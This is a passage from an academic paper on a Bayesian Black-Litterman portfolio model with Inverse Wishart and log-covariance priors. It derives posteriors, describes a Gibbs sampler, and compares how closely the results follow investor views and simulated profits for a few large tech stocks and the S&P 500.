=\\sum_{i=1}^m Tr \\left((r_i^*-\\mu^*)(r_i^*-\\mu^*)^T{\\Sigma^*}^{-1}\\right)= \\\\\n =Tr \\left(\\sum_{i=1}^m(r_i^*-\\mu^*)(r_i^*-\\mu^*)^T{\\Sigma^*}^{-1}\\right)\\end{gathered}$$ Finally, by using this result and equation (\\[eq8\\]), we obtain: $$\\begin{gathered}\n (\\ref{eq8})\\Leftrightarrow f(\\Sigma^*|r_1^*,...,r_m^*,\\mu^*)\\propto det(\\Sigma^*)^{-\\frac{\\nu+m+n+1}{2}}\\\\\n exp \\left \\{ -\\frac{1}{2} Trace\\left ( \\left (\\Sigma_0+\\sum_{i=1}^m (r_i^*-\\mu^*)(r_i^*-\\mu^*)^T \\right ){\\Sigma^*}^{-1}\\right) \\right \\}\\end{gathered}$$\n\nWe notice that this is the kernel of an Inverse Wishart distribution. ", "Therefore, we can conclude that: $$\\begin{gathered}\n \\label{sigma posterior}\n \\Sigma^*|r_1^*,...,r_m^*,\\mu^* \\sim W^{-1}\\left(\\nu+m,\\Sigma_0+\\sum_{i=1}^m (r_i^*-\\mu^*)(r_i^*-\\mu^*)^T\\right)\\end{gathered}$$\n\nNow that we have the posterior distributions, we can implement a Gibbs Sampler, which we will see in the following section, where we will also look at how the parameters of the model were estimated.", "\n\nImplementation\n--------------\n\nFor implementation purposes, $4$ stocks were chosen: Apple(AAPL), Amazon(AMZN), Google(GOOG) and Microsoft(MSFT). ", "Closing prices for the $4$ from 1/2/2015 until 5/1/2017 were considered and the returns were computed. ", "Now, this data is split into $2$ parts, one representing the *current data* (the last $m$ returns $r_1,...,r_m$, here $m=21$) and the rest representing *historical data* used to estimate the parameters in the model. ", "The reason why $m=21$ was chosen is because we are thinking of modeling the returns that happen within a period of approximately a month and $21$ is the average number of trading days in a month. ", "Hence, in this example, the trading period for such an investor would be over a month. ", "Next step is to augment $P$ as discussed in section \\[P inv\\]. ", "Once $P^*$ is created, we can just create our transformed returns $r_i^*=P^*r_i$. For this example, the personal views were (the columns represent AAPL, AMZN, GOOG, MSFT, respectively):\n\n$$P=\n\\begin{bmatrix}\n 1 & -1 & 0 & 0 \\\\\n 0 & 0 & 1 & -1\n\\end{bmatrix},\nq=\n\\begin{bmatrix}\n 0.02 \\\\\n 0.05\n\\end{bmatrix}$$\n\nIf we look at the second assumption in the model represented by equation (\\[ass2\\]), we notice that $q^*$ and $\\Omega^*$ are, respectively, the mean and covariance matrix for $\\mu^*$, which is in turn a mean of returns from a particular month (again, in this example $m=21$, approximately a month). ", "Hence, one solution for estimating the parameters would be to take the returns from each month in the historical data and to compute their means. ", "This way, we would have estimates for the monthly mean returns $\\hat{\\mu^*_i}$, with $i$ an integer between $1$ and the number of months in the historical data. ", "Once we obtain those, we can estimate $\\hat{q^*}$ and $\\hat{\\Omega^*}$ by taking the mean and the covariance of $\\hat{\\mu^*_i}$.\n\nBut, we have to remember that we need to reflect our personal views in the estimation presented above. ", "In equations (\\[q\\*\\]) and (\\[Omega\\*\\]), we have showed how one should combine the estimates from the procedure just presented with the investor’s personal views:\n\n- Equation (\\[q\\*\\]) shows that we should take the $\\hat{q^*}$ obtained through the above estimation and replace the first $k$ entries with $q$ ($k$, as mentioned at the beginning, was the number of personal views).", "\n\n- Equation (\\[Omega\\*\\]) shows that we should take the obtained $\\hat{\\Omega^*}$ and replace the top left $k \\times k$ matrix with our personal choice of $\\Omega$.\n\nNow that the parameters of our model are estimated, a typical Gibbs Sampler was used based on the posteriors represented by equations (\\[sigma posterior\\]) and (\\[posterior mu\\]).", "\n\n$ {\\Sigma^*}^{(t+1)}|r_1^*,...,r_m^*,{\\mu^*}^{(t)} \\sim W^{-1}\\left(\\nu+m,\\Sigma_0+\\sum_{i=1}^m (r_i^*-{\\mu^*}^{(t)})(r_i^*-{\\mu^*}^{(t)})^T\\right)$ $$\\begin{gathered}\n {\\mu^*}^{(t+1)}|r_1^*,...,r_m^*,{\\Sigma^*}^{(t+1)} \\sim N_n \\left({\\overline{\\mu^*}}^{(t+1)},{\\overline{\\Sigma^*}}^{(t+1)}\\right), \\text{ where } \\\\\n \\overline{{\\mu^*}^{(t+1)}}=\\left(m{{\\Sigma^*}^{(t+1)}}^{-1}+{\\Omega^*}^{-1}\\right)^{-1}\\left(m{{\\Sigma^*}^{(t+1)}}^{-1}\\bar r^*+{\\Omega^*}^{-1} q^*\\right)\\\\\n {\\overline{\\Sigma^*}^{(t+1)}}=\\left(m{{\\Sigma^*}^{(t+1)}}^{-1}+{\\Omega^*}^{-1}\\right)^{-1} \\end{gathered}$$\n\nA burning period of $10^3$ was chosen and the number of iterations for the Gibbs Sampler is $10^4$. After the Gibbs sampler is completed, one would only have to take the mean of the simulated ${\\mu^*}^{(t)}$, call it $\\hat{\\overline{\\mu^*}}$, and the average of the simulated ${\\Sigma^*}^{(t)}$, call it $\\hat{\\overline{\\Sigma^*}}$. However, one has to remember that those were transformed using $P^*$, hence now we would have to transform them back into the original space: $\\hat{\\overline{\\mu}}={P^*}^{-1}\\hat{\\overline{\\mu^*}}, \\hat{\\overline{\\Sigma}}={P^*}^{-1}\\hat{\\overline{\\Sigma^*}}{P^*}^{-T}$. Just like in the original model, in order to get the weights, one would use an equation similar to the CAPM one presented in section \\[introduction to model\\]: $w=\\frac{1}{\\lambda}\\hat{\\overline{\\Sigma}}^{-1}\\hat{\\overline{\\mu}}$. Here, $\\lambda=2.5$, as chosen in the original model. ", "Also there has been extensive research when it comes to choosing $\\lambda$. For trading stocks a risk aversion coefficient between $2$ and $3$ is reasonable.[@janecek2004] Finally, we are ready to compare the results obtained under the original model with the ones obtained from this one.", "\n\nResults Comparison {#results comparison}\n------------------\n\nBefore we delve into how we compare the $2$ approaches, let us make the observation that in order to make any kind of comparison, one has to make sure that the same data sets were used and the parameters were estimated in the same way. ", "Albeit the same personal views were imputed (same $P$, $\\Omega$, $q$), the two approaches differ in the fact that the alternative one has a prior on $\\Sigma$ and the original one makes use of the market equilibrium returns, which is estimated using $\\pi=\\lambda\\Sigma w_{eq}$. In the following table, we ca look at the setup for both side by side:\n\n ---------------------------------------------------------------------------------\n Alternative Original\n --------------------------------------------------- -----------------------------\n $\\begin{aligned} $\\begin{aligned}\n r_1^*,r_2^*,...,r_m^* \\sim N_n(\\mu^*,\\Sigma^*) \\\\ r \\sim N(\\mu,\\Sigma) \\\\\n \\mu^* \\sim N(q^*,\\Omega^*) \\mu \\sim N(\\pi,\\tau \\Sigma)\n \\end{aligned}$ \\end{aligned}$\n ---------------------------------------------------------------------------------\n\nInstead of the market equilibrium, the alternative approach simply has another parameter, which is estimated as mentioned in section \\[implementation\\] (also the alternative has a prior on $\\Sigma$ and takes into consideration current data). ", "Besides this difference, the two are using the same data sets and the same parameters. ", "Now, the question becomes how should one compare the two. ", "One obvious approach would be to see how the two would perform if one would use them on the real market, which will be presented in the results section for the models that will follow later in this paper. ", "However, it is of more interest to us to check how close to our personal opinion is the posterior mean obtained from the Gibbs Sampler.", "\n\n\\[remark 1\\] Since for both models we have that $P\\mu \\sim N(q,\\Omega)$, the smaller the uncertainty in our views (the diagonal entries of $\\Omega$), the smaller the standard deviation and, hence, the more certain the investor is about that particular view.", "\n\nHence, from the above remark, we will look at how $P \\hat{\\bar{\\mu}}$ behaves as we look at small values for the diagonal entries of $\\Omega$. But how should one define “small”? ", "As we have seen in section \\[implementation\\], the expected returns for the views were $q=\n\\begin{bmatrix}\n 0.02 \\\\\n 0.05\n\\end{bmatrix}$. Hence, even a value of $10^{-4}$ is quite large since this would be the variance of our view and, therefore, the standard deviation would become $10^{-2}$. Hence, a $95\\%$ confidence interval for the first view would be $(0,0.04)$. If one tries to input even smaller $\\omega$, the Inverse Wishart random generator gives a non-singularity error. ", "Hence, we conclude that we compare the models on values of the diagonal of the matrix $\\Omega$ that are between $0$ and $10^{-4}$. Albeit we can’t input smaller $\\omega$, for the purposes of checking the following remark, we changed $q$ to $q=\\begin{bmatrix}\n0.2 \\\\\n0.5\n\\end{bmatrix}$. Hence, for both models an exhaustive method was implemented that would compute for each pair of diagonal entries in $\\Omega$ a posterior mean $\\hat{\\overline{\\mu}}$. Once this is obtained, the distance $|P\\hat{\\overline{\\mu}}-q|$ can be calculated for both models.", "\n\n\\[remark 2\\] Since $P\\mu \\sim N(q,\\Omega)$, we have that $\\lim_{\\Omega \\to O_2}P\\mu=q$ a.s.", "\n\nTherefore, as the diagonal entries of $\\Omega$ get smaller and smaller we expect to get closer and closer to $q$.\n\nIf we look at the posterior of $\\mu^*$ we have that: $$\\begin{gathered}\n \\mu^*|r_1^*,...,r_m^*,\\Sigma^* \\sim N_n \\left(\\overline{\\mu^*},\\overline{\\Sigma^*}\\right), \\text{ where } \\\\\n \\overline{{\\mu^*}}=\\left(m{\\Sigma^*}^{-1}+{\\Omega^*}^{-1}\\right)^{-1}\\left(m{\\Sigma^*}^{-1}\\bar r^*+{\\Omega^*}^{-1} q^*\\right)\\\\\n \\overline{\\Sigma^*}=\\left(m{\\Sigma^*}^{-1}+{\\Omega^*}^{-1}\\right)^{-1}\\end{gathered}$$ If we consider a small $\\Omega^*\\Rightarrow {\\Omega^*}^{-1}$ is large and therefore the whole term $m{\\Sigma^*}^{-1}+{\\Omega^*}^{-1} \\approx {\\Omega^*}^{-1}\\Rightarrow (m{\\Sigma^*}^{-1}+{\\Omega^*}^{-1})^{-1} \\approx \\Omega^*$. Similarly, $(m{\\Sigma^*}^{-1}\\bar r^*+{\\Omega^*}^{-1} q^*) \\approx {\\Omega^*}^{-1} q^*$ for small enough $\\Omega^*$. Hence, we would expect that the mean of the simulated ${\\mu^*}^{(t)}$ is close to $q^*$. Or, with the notation already used, $\\hat{\\overline{\\mu^*}}\\approx q^*$. Hence, by using the previous remark also, we obtain that $P({P^*}^{-1}\\overline{\\mu^*})\\approx q$.\n\nThe following graphs have as $2$ of the axis the $2$ diagonal entries in $\\Omega$ and the third one represents the distance $|P\\overline{\\mu}-q|=|P({P^*}^{-1}\\overline{\\mu^*})-q|$ :\n\n![", "Results of $\\Omega$ for original model](BBL_very_small_omegas_nu_changed_10_5_steps){width=\"\\textwidth\"}\n\n![", "Results of $\\Omega$ for original model](BL_very_small_omegas_q1=02,q2=05){width=\"\\textwidth\"}\n\nWe notice from the z-axis, which represents the distance mentioned above, that the modified model more closely follows the personal views. ", "We can look at some specific values of the distance for different pairs of $\\omega_1$ and $\\omega_2$ in table \\[table 1\\].", "\n\n --------------------- ------------ ---------- -------------\n $\\omega_1$ $\\omega_2$ Original Alternative\n \\[0.5ex\\] $10^{-4}$ 0.0001 0.154 0.052\n $10^{-4}$ 0.00015 0.2 0.063\n $10^{-4}$ 0.0002 0.235 0.077\n $10^{-4}$ 0.00025 0.263 0.118\n $10^{-4}$ 0.0003 0.286 0.118\n $10^{-4}$ 0.00035 0.305 0.145\n $10^{-4}$ 0.0004 0.321 0.177\n $10^{-4}$ 0.00045 0.335 0.222\n $10^{-4}$ 0.0005 0.347 0.282\n $10^{-4}$ 0.00055 0.357 0.354\n \\[1ex\\] \n --------------------- ------------ ---------- -------------\n\n : Table with specific distance values[]{data-label=\"table 1\"}\n\nHowever, we would like to see if the structure of $P\\hat{\\overline{\\mu}}$ is similar to $q$. For this we keep the two entries in $\\Omega$ equal, we exhaustively search over small $\\omega$ s.t. ", "$\\Omega=\\omega\\mathbb{I}$ and we plot the 2 entries of $P\\hat{\\overline{\\mu}}$ together with the respective $\\omega$. Please note that the blue point in figures \\[alt vs orig\\] represent the exact value of $q=\n\\begin{bmatrix}\n 0.2 \\\\\n 0.5\n\\end{bmatrix}$, which would be obtained for $\\omega=0$.\n\nBy comparing the $2$ figures, we notice that not only the point simulations represented by the red points are closer, but the whole curve (which was obtained by interpolation) seems to be closer to the theoretical value represented by the blue point. ", "Also, we notice that in both cases, as $\\omega$ increases, $P\\hat{\\overline{\\mu}}$ gets further away from $q$, which is what theoretically should happen.", "\n\n![", "Results of $\\Omega$ for original model](BBL_very_small_omega_nu_changed_10_5_steps_q1=02,q2=05){width=\"\\textwidth\"}\n\n![", "Results of $\\Omega$ for original model](BL_o1_q1=02,q2=05_very_small_omega){width=\"\\textwidth\"}\n\n\\[alt vs orig\\]\n\nBut do we need an invertible $P$?", "\n---------------------------------\n\nIn section \\[P inv\\], we introduced a method of creating an invertible matrix $P$ by adding rows. ", "Ideally, the matrix of views should not be modified in any way. ", "Also, in general, one can’t create an invertible matrix by adding rows, especially when the number of views is close to the number of stocks selected. ", "Also, the method of augmenting $P$ is not unique. ", "Therefore, we would like to be able to derive the posteriors when $P$ is unchanged from what the investor is inputting. ", "Hence, in this section, we will consider the same setup as before, the only difference being the fact that $P$ is not even square:\n\n$$\\begin{gathered}\nr_1,r_2,...,r_m|\\mu,\\Sigma \\sim N_n(\\mu,\\Sigma) \\\\\nP\\mu \\sim N_k(q,\\Omega) \\\\\n\\Sigma \\sim W^{-1}(\\nu,\\Sigma_0)\\end{gathered}$$\n\nSince $P$ shows up in the second equation of our model assumptions, the only posterior that will change from what we had previously will be that for $\\mu$. Hence, in the joint distribution, we will consider only the terms depending on $\\mu$:\n\n$$\\begin{gathered}\nf(\\mu|r_1,...,r_m)\\propto exp \\left\\lbrace -\\frac{1}{2} \\sum_{i=1}^m (r_i-\\mu)^T \\Sigma^{-1} (r_i-\\mu) \\right\\rbrace \\cdot \\\\\n\\cdot exp \\left\\lbrace -\\frac{1}{2}(P\\mu-q)^T \\Omega^{-1} (P\\mu-q) \\right\\rbrace\\end{gathered}$$\n\nFor the first exponential we can use Lemma \\[r-mu identity\\]. ", "This yields: $$\\begin{gathered}\nf(\\mu|r_1,...,r_m)\\propto exp \\left\\lbrace -\\frac{1}{2} \\left( (m-1)s^2+m(\\overline{r}-\\mu)^T\\Sigma^{-1}(\\overline{r}-\\mu) \\right) \\right\\rbrace \\cdot \\\\\n\\cdot exp \\left\\lbrace -\\frac{1}{2}(q-P\\mu)^T \\Omega^{-1} (q-P\\mu) \\right\\rbrace\\end{gathered}$$\n\nWe remember that $s^2=\\frac{\\sum_{i=1}^m (r_i-\\bar r)^T{\\Sigma}^{-1}(r_i-\\bar r)}{m-1}$ and hence this term does not depend on $\\mu$. Now, let us focus on the remaining terms in the exponential: $$\\begin{gathered}\n(\\overline{r}-\\mu)^T(m\\Sigma^{-1})(\\overline{r}-\\mu)+ (q-P\\mu)^T \\Omega^{-1} (q-P\\mu)=\\\\\n=\\overline{r}^T(m\\Sigma^{-1})\\overline{r}-2\\overline{r}^T(m\\Sigma^{-1})\\mu+\\mu^T(m\\Sigma^{-1})\\mu+q^T\\Omega^{-1}q-2q^T\\Omega^{-1}P\\mu+\\\\\n+\\mu^TP^T\\Omega^{-1}P\\mu=\\mu^T\\left( m\\Sigma^{-1}+P^T\\Omega^{-1}P \\right)\\mu-2\\left( \\overline{r}^T(m\\Sigma^{-1})+q^T\\Omega^{-1}P \\right)\\mu+\\\\\n+\\overline{r}^T(m\\Sigma^{-1})\\overline{r}+q^T\\Omega^{-1}q\\end{gathered}$$\n\nSince only the first two terms depend on $\\mu$, we obtain that: $$\\begin{gathered}\nf(\\mu|r_1,...,r_m,\\Sigma)\\propto exp \\left\\lbrace -\\frac{1}{2} \\mu^T(m\\Sigma^{-1}+P^T\\Omega^{-1}P)\\mu \\right\\rbrace \\cdot \\\\\n\\cdot exp \\left\\lbrace -\\frac{1}{2}2(m\\Sigma^{-1}\\overline{r}+P^T\\Omega^{-1}q)^T\\mu \\right\\rbrace\\end{gathered}$$\n\nLet $M$ be a symmetric and invertible matrix, then the following identity holds: $$\\begin{gathered}\nx^TMx-2b^Tx=(x-M^{-1}b)^TM(x-M^{-1}b)-b^TM^{-1}b\\end{gathered}$$\n\nWe just need to expand the quadratic term: $$\\begin{gathered}\n(x-M^{-1}b)^TM(x-M^{-1}b)=x^TMx-2b^TM^{-1}Mx+b^TM^{-1}MM^{-1}b=\\\\\n=x^TMx-2b^Tx+b^TM^{-1}b\\end{gathered}$$\n\nHence, if we apply this lemma for $x=\\mu$, $M=m\\Sigma^{-1}+P^T\\Omega^{-1}P$ and $b=m\\Sigma^{-1}\\overline{r}+P^T\\Omega^{-1}q$, we obtain that the exponential in the distribution of the posterior of $\\mu$ is (the $-\\frac{1}{2}$ still sits in front of the formula, we just omit it in the following for simplicity of writing): $$\\begin{gathered}\n\\left( \\mu-(m\\Sigma^{-1}+P^T\\Omega^{-1}P)^{-1}(m\\Sigma^{-1}\\overline{r}+P^T\\Omega^{-1}q) \\right)^T(m\\Sigma^{-1}+P^T\\Omega^{-1}P)\\cdot \\\\\n\\cdot \\left( \\mu-(m\\Sigma^{-1}+P^T\\Omega^{-1}P)^{-1}(m\\Sigma^{-1}\\overline{r}+P^T\\Omega^{-1}q) \\right)-b^TM^{-1}b\\end{gathered}$$\n\nLastly, we notice that $b$ and $M$ do not depend on $\\mu$, and hence, the posterior of $\\mu$ is dictated by the first big term, which is actually the density of a normal distribution: $$\\begin{gathered}\n\\boxed{\n\\mu|r_1,...,r_m,\\Sigma \\sim N\\left(\\mu_{post}, \\Sigma_{post} \\right)} ,\\text{ where } \\\\\n\\boxed{\n\\mu_{post}=(m\\Sigma^{-1}+P^T\\Omega^{-1}P)^{-1}(m\\Sigma^{-1}\\overline{r}+P^T\\Omega^{-1}q)} \\\\\n\\boxed{\n\\Sigma_{post}=\\left( m\\Sigma^{-1}+P^T\\Omega^{-1}P \\right)^{-1}\n}\\end{gathered}$$\n\nThis posterior is very close to the one obtained by using the first approach (represented by equation (\\[posterior mu\\])), the only difference being the fact that in this new approach the matrix $P$ shows up. ", "This is because here we did not change the investor inputted matrix $P$, while in the previous approach we augmented $P$ in order for it to be invertible.", "\n\nImplementation {#implementation}\n--------------\n\nImplementing this model is straightforward since it is very similar to the previous version. ", "The only difference is the fact that in the posterior for $\\mu$ we have $P$ appearing, while in the previous model there was no $P$ since we were adding rows to it so that it becomes invertible. ", "We remind ourselves that this was the first approach because we can take the inverse and easily find the prior distribution of $\\mu$ from the prior distribution of $P\\mu$. Using the derived posteriors, the Gibbs Sampler is:\n\n$ {\\Sigma}^{(t+1)}|r_1,...,r_m,{\\mu}^{(t)} \\sim W^{-1}\\left(\\nu+m,\\Sigma_0+\\sum_{i=1}^m (r_i-{\\mu}^{(t)})(r_i-{\\mu}^{(t)})^T\\right)$ $$\\begin{gathered}\n{\\mu}^{(t+1)}|r_1,...,r_m,{\\Sigma}^{(t+1)} \\sim N\\left({\\mu_{post}}^{(t+1)}, {\\Sigma_{post}}^{(t+1)} \\right) ,\\\\\n{\\mu_{post}}^{(t+1)}=(m{\\Sigma^{(t+1)}}^{-1}+P^T\\Omega^{-1}P)^{-1}(m{\\Sigma^{(t+1)}}^{-1}\\overline{r}+P^T\\Omega^{-1}q) \\\\\n{\\Sigma_{post}}^{(t+1)}=\\left( m{\\Sigma^{(t+1)}}^{-1}+P^T\\Omega^{-1}P \\right)^{-1}\\end{gathered}$$\n\nResults {#results P nonsqr Inv Wish}\n-------\n\nJust like before, we will try to look at the sensitivity of our model to different confidence levels. ", "Remarks \\[remark 1\\] and \\[remark 2\\] made when we presented the results for the previous model still hold. ", "Since in $\\Omega$ we have on the main diagonal (call them $\\omega_i$) the variances in our views $P\\mu$, the smaller the $\\omega_i$, the more certain we are in view $i$. This should also be reflected in our posterior: if we provide very large $\\omega_i$, it means that we are very uncertain about the views and the model should take into consideration the history a lot more, while if we provide very small values for $\\omega_i$, it means that we are very certain about the views and the model should take them into consideration a lot more than the history.", "\n\nJust like before, in order to quantify and visualize the model’s sensitivity to different confidence levels, we will look at the distance $|P\\mu_{post}-q|$ (which will be on one of the axis in our plots) over different combinations of $\\omega_i$. The same $4$ stocks from before were chosen (AAPL,AMZN,GOOG,MSFT), but since this work is more recent, the daily returns are from 1/2/2014 to 12/29/2017. ", "The views are (rows are views and the columns represent the 4 stocks in the order AAPL,AMZN,GOOG,MSFT):\n\n$$\\begin{gathered}\nq=\\begin{bmatrix}\n0.02\\\\\n0.05\n\\end{bmatrix},\nP=\\begin{bmatrix}\n-1 & 1 & 0 & 0\\\\\n0 & 0 & 1 & -1\\\\\n\\end{bmatrix}\\end{gathered}$$\n\nWhen it comes to the confidence levels in the $2$ views, one can input values as small as $10^{-7}$ without encountering any numerical issues, like we did previously when we were augmenting the matrix $P$. Hence, one doesn’t need to make any change to the model when implementing it or when inputting any value. ", "We take a grid of equally spaced points $(\\omega_1,\\omega_2)$ between $10^{-7}$ and $2\\cdot 10^{-5}$. The burn period was set to $10^3$ and the number of iterations in the Gibbs Sampler was set to $10^4$.\n\nHowever, one could also use the same views, but considering the daily returns for the whole $S\\&P 500$ instead of just for $4$ stocks. ", "For this, we need the daily returns of companies actively traded in $S\\&P 500$ over the period mentioned before. ", "We won’t have to change $q$ at all, but $P$ has more columns since they would represent the stocks in the famous index and it will still have $2$ rows for the same $2$ views. ", "One would fill out $P$ by making sure that in the first row and the column corresponding to AAPL we will have a $-1$, in the first row and the column corresponding to AMZN we will have a $1$ and similarly for the second row. ", "Of course, the dimension of some of the matrices and vectors will be much bigger and therefore, all computations will be more expensive. ", "Hence, this version was parallelized and the number of iterations in the Gibbs Sampler decreased to $10^3$ (as we will see, even with so few iterations, convergence for the mean is achieved, but convergence for the covariance matrix is not). ", "The interval $10^{-7}$ to $10^{-5}$ for the confidence levels was split into $4$ parts, in the following way:\n\n$$\\begin{gathered}\n(\\omega_1,\\omega_2)\\in \\begin{cases}\n\\left( 10^{-6}\\rightarrow 10^{-5},10^{-6}\\rightarrow 10^{-5} \\right)\\\\\n\\left( 10^{-5}\\rightarrow 10^{-4},10^{-5}\\rightarrow 10^{-4} \\right)\\\\\n\\left( 10^{-6}\\rightarrow 10^{-5},10^{-5}\\rightarrow 10^{-4} \\right)\\\\\n\\left( 10^{-5}\\rightarrow 10^{-4},10^{-6}\\rightarrow 10^{-5} \\right)\n\\end{cases}\\end{gathered}$$\n\nEach one of the $4$ ranges from above was divided into a grid of $7^2$ points. ", "Each point was ran on one core, taking a little more than $4$ hours to run.", "\n\n- When $\\omega_1=10^{-6}$, a $95\\%$ confidence interval for the first view would be $(0.018,0.022)$, which would show that the investor is very confident.", "\n\n- When $\\omega_1=10^{-4}$, a $95\\%$ confidence interval for the first view would be $(0,0.04)$, which would show that the investor is not as confident.", "\n\n![", "$|P\\mu_{post}-q|$ when taking $S\\&P 500$](V7_unscaled_P_nonsquare_sim_o1,o2_profit_distance_q_2,5_10_4){width=\"\\textwidth\"}\n\n![", "$|P\\mu_{post}-q|$ when taking $S\\&P 500$](V7_unscaled_P_nonsquare_choose_4_sim_o1,o2_10_3_profit_dist_q_2,5_detailed){width=\"\\textwidth\"}\n\nIn the figures presented, we notice that both curves have similar shapes, albeit the one on the right converges faster to $0$ as $o_i$ become smaller ($\\omega_i$ in our model). ", "Also, the curve on the right seems to be underneath the one on the left. ", "Intuitively, this is because there is a lot more information in our prior for $\\Sigma$ when we take the whole $S\\&P 500$. Moreover, both have very similar shapes. ", "The distances go to $0$ as $\\omega_i$ go to $0$. This is in tune with our intuition of how the model should behave like: as one gets more and more confident in their inputted views, the model should put a lot of importance on them and not on the historical data. ", "Vice-versa, in both figures the distance seems to converge to a certain value as $\\omega_i$ become bigger and bigger. ", "Again, this is what we would think that the model should do since large $\\omega_i$, suggests that one is uncertain about the personal view and therefore, the history should play a more important role. ", "Indeed, if we would only take the historical returns, an unbiased estimate for $\\mu$ is $\\overline{r}$ and the distance becomes $|P\\overline{r}-q|=0.05388875$, which is what the plots seem to tend to converge to.", "\n\nWe will move our focus towards looking at the profits (or losses) that one would obtain when using the model to trade over the month of January 2018 (testing data consisting of daily returns between 1/2/2018 and 1/30/2018) using an initial capital of $100,000\\$$ (this does not include any capital requirements for short selling). ", "We remember that in order to get portfolio weights we use the same approach as before. ", "From Gibbs Sampling we estimate $\\mu_{post}$ and $\\Sigma_{post}$ and we use the CAPM equation \\[eq capm\\]: $w=\\frac{1}{2.5}{\\Sigma_{post}}^{-1}\\mu_{post}$.\n\nAlbeit when we took the whole $S\\&P 500$ the number of iterations in the Gibbs Sampler was small, we notice from the above analysis that we still get very good estimates for $\\mu_{post}$ since the posterior distance behaves exactly like our intuition suggests it should do. ", "The running averages for the mean also converge fast for small $\\omega_i$. However, because of the size of $\\Sigma_{post}$ and because of the fact that one has to take its inverse in order to compute the portfolio weights $w$, the number of iterations is not enough to give accurate predictions of profits. ", "Nevertheless, for completeness, the average profit when considering the whole $S\\&P 500$ is $13191.39\\$$ with a standard deviation of $2908.134\\$$.\n\nWe will now present the profits obtained when using only $4$ stocks. ", "We notice that the first view has a bigger impact on the profits curve than the second view. ", "Moreover, as the confidence in the first view increases (as $\\omega_1$ goes to $0$), the profits sky rocket. ", "This is because over the month of January 2018 AMZN outperformed AAPL by $23.997\\%$ and our view was indeed that AMZN will overrun AAPL (albeit by only $2\\%$, a $10^{th}$ of what actually happened in reality).", "\n\n![", "Profit when taking only $4$ stocks](V7_unscaled_P_nonsquare_sim_o1,o2_profit_q_2,5_10_4){width=\"\\textwidth\"}\n\nAMZN outperforming AAPL by nearly $24\\%$ in one month is uncommon. ", "Therefore, next we will present the same results, the only change made is that we replace AMZN with FB (Facebook). ", "The same data sets were used and all other inputs stay exactly the same as we just presented at the beginning of this section, except $q$. We will also look at how the model behaves when the investor inputs a personal view exactly like what happened during the month of January 2018 (very “informed” investor) and exactly the opposite of what happened during the month of January (very “uninformed” investor). ", "Therefore, we will also look at what happens when we choose $q=\\begin{bmatrix}\n0.06212815\\\\\n0.01366718\n\\end{bmatrix}$ and $q=-\\begin{bmatrix}\n0.06212815\\\\\n0.01366718\n\\end{bmatrix}$, respectively.", "\n\n![", "$4$ stocks, FB in and view opposite of reality](V7_unscaled_P_nonsquare_sim_o1,o2_FB_distance_q_2,5_10_4){width=\"\\textwidth\"}\n\n![", "$4$ stocks, FB in and view opposite of reality](V7_unscaled_P_nonsquare_sim_o1,o2_FB_distance_q_real_10_4){width=\"\\textwidth\"}\n\n![", "$4$ stocks, FB in and view opposite of reality](V7_unscaled_P_nonsquare_sim_o1,o2_FB_distance_-q_real_10_4){width=\"\\textwidth\"}\n\n![", "$S\\&P 500$ FB in and view opposite of reality](V7_unscaled_P_nonsquare_choose_4_from_500_FB_sim_o1,o2_distance_q_2,5_detailed){width=\"\\textwidth\"}\n\n![", "$S\\&P 500$ FB in and view opposite of reality](V7_unscaled_P_nonsquare_choose_4_from_500_FB_sim_o1,o2_distance_q_real_detailed){width=\"\\textwidth\"}\n\n![", "$S\\&P 500$ FB in and view opposite of reality](V7_unscaled_P_nonsquare_choose_4_from_500_FB_sim_o1,o2_distance_-q_real_detailed){width=\"\\textwidth\"}\n\nAgain, just like before, we notice that, as $\\omega_i$ get smaller and smaller, when taking into account the whole $S\\&P 500$, the curve seems to be under and closer to $0$ than the one when taking into account only $4$ stocks. ", "This might be because the prior on the covariance matrix containing the whole $S\\&P 500$ has more information than the one which only has $4$ stocks. ", "Moreover, for the same $q$, the curves have a similar orientation and general shape. ", "Hence, this confirms the belief that albeit a small number of iterations was used for the Gibbs Sampler that takes into account the whole $S\\&P 500$, the estimated posterior mean is still accurate. ", "However, as mentioned before, the estimate for $\\Sigma_{post}^{-1}$ when it’s size is big is not accurate enough to have very reliable profit estimates.", "\n\nNevertheless, for completeness of this analysis, we proceed by leaving all the inputs mentioned before unchanged and keeping $q=\\begin{bmatrix}\n0.02\\\\\n0.05\n\\end{bmatrix}$. When taking into account the whole $S\\&P 500$, the average profit over the before mentioned range of simulated pairs $(\\omega_1,\\omega_2)$ is $11,619.97\\$$ with a standard deviation of $2,852.246\\$$. In the next plot we can observe the profits obtained when considering just the $4$ stocks mentioned before.", "\n\n![", "Profit $4$ stocks, FB in and $q={[0.02,0.05]}^T$](V7_unscaled_P_nonsquare_sim_o1,o2_FB_profit_q_2,5_10_4){width=\"\\textwidth\"}\n\nFrom the figure, one can see that the first view has a higher influence on the profits than the second view. ", "This is because if we let $\\omega_2$ constant the resulting curve increases a lot faster than the curve obtained by keeping $\\omega_1$ constant.", "\n\nPrior on $log(\\Sigma)$ {#log(sigma) prior}\n======================\n\nIntroduction\n------------\n\nJust like when introducing the approach with an Inverse Wishart prior, let us see what we would like to improve on it:\n\n- Ideally, the matrix of views $P$ should not be augmented or changed in any way. ", "It should be left just like the user inputted it.", "\n\n- One should try a different prior than the Inverse Wishart, which has been used numerous times.", "\n\nTherefore, two of the assumptions will be unchanged: $$\\begin{gathered}\nr_1,r_2,...,r_m|\\mu,\\Sigma \\sim N_n(\\mu,\\Sigma) \\\\\nP\\mu \\sim N_k(q,\\Omega) \\\\\\end{gathered}$$\n\nA very interesting idea for a different prior on the covariance matrix is presented by Leonard and Hsu (1992)[@hsu1992]. ", "As the title of this section is hinting, this prior will actually be on $log(\\Sigma)$. In order to better understand Leonard and Hsu’s idea, let us look at the distribution:\n\n$$\\begin{gathered}\nf(r_1,...,r_m|\\mu,\\Sigma)=(2\\pi)^{-\\frac{mn}{2}}det(\\Sigma)^{-\\frac{m}{2}}exp \\left \\{-\\frac{1}{2} \\sum_{i=1}^{m} (r_i-\\mu)^T\\Sigma^{-1}(r_i-\\mu) \\right \\}\\end{gathered}$$\n\nLet $A=log(\\Sigma)$, ${\\lambda_{A}}_i$ and ${\\lambda_{\\Sigma}}_i$ (with $i=\\overline{1,n}$) be the eigenvalues of $A$ and $\\Sigma$ respectively. ", "Since $A=log(\\Sigma)$ we obtain that ${\\lambda_{A}}_i=log({\\lambda_{\\Sigma}}_i)\\Rightarrow {\\lambda_{\\Sigma}}_i=e^{{\\lambda_{A}}_i}$. Finally, by remembering that the determinant is the product of the eigenvalues and that the trace of a matrix is the sum of the eigenvalues, we notice that 